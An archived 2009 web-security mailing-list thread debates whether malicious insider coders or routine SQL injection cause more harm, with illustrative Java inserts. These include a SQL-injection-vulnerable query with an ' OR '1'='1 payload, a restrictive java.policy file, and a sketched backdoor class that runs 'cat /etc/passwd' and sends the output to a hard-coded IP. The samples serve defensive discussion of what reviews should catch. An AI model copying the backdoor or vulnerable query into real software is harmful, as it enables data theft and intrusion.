[WEB SECURITY] code review techniques for when you don't trust your developers or testers

Hoffman, Billy billy.hoffman at hp.com
Fri Aug 14 02:03:37 EDT 2009


I think if you added up the money, the legions of developers who *still* don't understand even the simplest of input validation do *way* more damage than an extremely rare insider threat. Let's walk before we run here, people. I don't want to be having the "which is better: the dynamic evil-coder scanner, static analysis for evil coders, or that big guy with the thick neck named WAFF with the rubber hose by the door?" argument in 5 years.
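
(And just to show how low that bar really is -- a minimal sketch in plain JDBC, with a made-up "users" table and a java.sql.Connection handed in by the caller: the difference between the concatenation that keeps producing that 900th SQLi and the bound parameter that ends it.)

    import java.sql.Connection;
    import java.sql.PreparedStatement;
    import java.sql.ResultSet;
    import java.sql.SQLException;

    public class UserLookup {

        // Vulnerable: attacker-controlled 'email' is spliced straight into the
        // SQL text, so input like  ' OR '1'='1  rewrites the query itself.
        static ResultSet findUserUnsafe(Connection conn, String email) throws SQLException {
            return conn.createStatement()
                       .executeQuery("SELECT * FROM users WHERE email = '" + email + "'");
        }

        // Safe: the driver sends 'email' as a bound value, never as SQL.
        static ResultSet findUser(Connection conn, String email) throws SQLException {
            PreparedStatement ps =
                conn.prepareStatement("SELECT * FROM users WHERE email = ?");
            ps.setString(1, email);
            return ps.executeQuery();
        }
    }

That is the whole fix, and we still can't get it shipped consistently. That's the fight I want to win first.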

Billy Hoffman
--
Manager, Web Security Research Group
HP Software
Direct: 770-343-7069


-----Original Message-----
From: Jim Manico [mailto:jim at manico.net] 
Sent: Thursday, August 13, 2009 7:42 PM
To: Bill Pennington; Steven M. Christey
Cc: kuznetso at alum.mit.edu; Mat Caughron; websecurity at webappsec.org; Hoffman, Billy
Subject: Re: [WEB SECURITY] code review techniques for when you don't trust your developers or testers

> I would love to see data on the frequency of evil coders doing bad
> stuff in code. I would be somewhat shocked if that was a bigger problem
> than a coder introducing SQLi for the 900th time.

One of the greatest failings of modern risk analysis is to ignore
incredibly low-likelihood but high-impact risks.

An insider senior coder who is evil can take you down, easily.

- Jim

----- Original Message ----- 
From: "Bill Pennington" <bill.pennington at whitehatsec.com>
To: "Steven M. Christey" <coley at linus.mitre.org>
Cc: "Jim Manico" <jim at manico.net>; <kuznetso at alum.mit.edu>; "Mat Caughron" 
<mat at phpconsulting.com>; <websecurity at webappsec.org>; "Hoffman, Billy" 
<billy.hoffman at hp.com>
Sent: Thursday, August 13, 2009 1:01 PM
Subject: Re: [WEB SECURITY] code review techniques for when you don't trust 
your developers or testers


> The only two insider-evil-coder forensics investigations I ever did were
> of the business-logic type. Both were so subtle that you would be highly
> unlikely to detect them. The only reason they were detected is that the
> bad guys had made verbal comments to others that led them to hand-review
> every check-in these people had done. Even then they did not catch it
> until 4 different developers had reviewed it. I have not seen a case
> where people are just randomly making network connections, but I will
> readily admit my data set is small.
>
> I would love to see data on the frequency of evil coders doing bad
> stuff in code. I would be somewhat shocked if that was a bigger problem
> than a coder introducing SQLi for the 900th time.
>
>
> ---
> Bill Pennington
> SVP Services
> WhiteHat Security Inc.
> http://www.whitehatsec.com
>
> On Aug 13, 2009, at 3:14 PM, Steven M. Christey wrote:
>
>>
>> On Thu, 13 Aug 2009, Jim Manico wrote:
>>
>>> This is a pain to get right, even more of a pain to maintain -
>>> especially since the tools to manage Java policy are poor, at best.  But
>>> I think it's our best defense in protecting an enterprise against the
>>> insider evil coder.
>>
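
(For anyone who hasn't wrestled with it, this is roughly what Jim is pointing
at -- a hypothetical java.policy fragment, codebase path, database host, and
port all made up, that grants only what the app legitimately needs so that
anything else is denied at runtime:)

    grant codeBase "file:/opt/acme/webapp/-" {
        // the only network endpoint the app is supposed to touch: its database
        permission java.net.SocketPermission "db.internal.acme.example:3306", "connect,resolve";

        // read-only access to its own config tree; no "execute" action anywhere
        permission java.io.FilePermission "/opt/acme/webapp/conf/-", "read";

        // harmless housekeeping
        permission java.util.PropertyPermission "*", "read";
    };

Start the JVM with -Djava.security.manager -Djava.security.policy==app.policy
(the double '=' replaces the default policy rather than extending it) and an
unexpected Runtime.exec() or outbound socket should die with an
AccessControlException. Jim's caveat stands: writing and maintaining that file
for a real application is the painful part.
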
>> There may be techniques for finding the "insider evil coder" doing things
>> that don't make sense, like executing an external program and sending
>> results across a hard-coded network connection - Veracode did a paper on
>> back door detection about a year ago. To get any depth at all, though,
>> you'd need a well-developed model of what the application is supposed to
>> do, especially with respect to its interfaces with the OS, downstream
>> components, etc.
>>
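
(To put a face on the pattern Steve describes -- a rough sketch, class name,
command, and address all made up, of the kind of "doesn't make sense" code a
back-door scan, or the policy file above, would have to flag: run an external
program and push its output to a hard-coded host.)

    import java.io.BufferedReader;
    import java.io.InputStreamReader;
    import java.io.OutputStream;
    import java.net.Socket;

    class MaintenanceTask {  // innocuous name; nothing here serves a business purpose

        static void run() throws Exception {
            // executes an external program...
            Process p = Runtime.getRuntime().exec(new String[] {"/bin/sh", "-c", "cat /etc/passwd"});
            BufferedReader out = new BufferedReader(new InputStreamReader(p.getInputStream()));

            // ...and sends the results across a hard-coded network connection
            Socket s = new Socket("203.0.113.7", 8443);
            OutputStream sink = s.getOutputStream();
            String line;
            while ((line = out.readLine()) != null) {
                sink.write((line + "\n").getBytes("UTF-8"));
            }
            sink.flush();
            s.close();
        }
    }

Pattern-matching for exec() plus a hard-coded socket is tractable; the
business-logic and covert-channel cases Steve gets to next are the ones that
are not.
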
>> That still won't address intentionally-introduced "business logic" issues
>> (with a narrower use of the term than perhaps Jeremiah's), or the use of
>> legitimate interfaces to create covert channels. In these cases, detection
>> requires full human understanding of what the code is supposed to be doing
>> with *simultaneous* expert understanding of the domain. Consider an odd
>> divide-by-zero error that can only occur in a certain time zone on one day
>> of a 30-year cycle with several other factors at play. If you could do
>> that type of analysis, then you would also probably have the ability to
>> detect every bug and produce a bug-free system. The theorists throw around
>> the "undecidable" term a lot when it comes to proving that code doesn't
>> have any bugs, and the evil-developer problem may be an alternate
>> expression of that.
>>
>> In other words, I think it's impossible to prove that modern web-based
>> applications are correct from a security perspective (even with respect
>> to only one layer of source code and ignoring the environment), and this
>> is even more impossible if you care about business-logic correctness on
>> top of the injection side of the spectrum.
>>
>> - Steve
>>


----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA


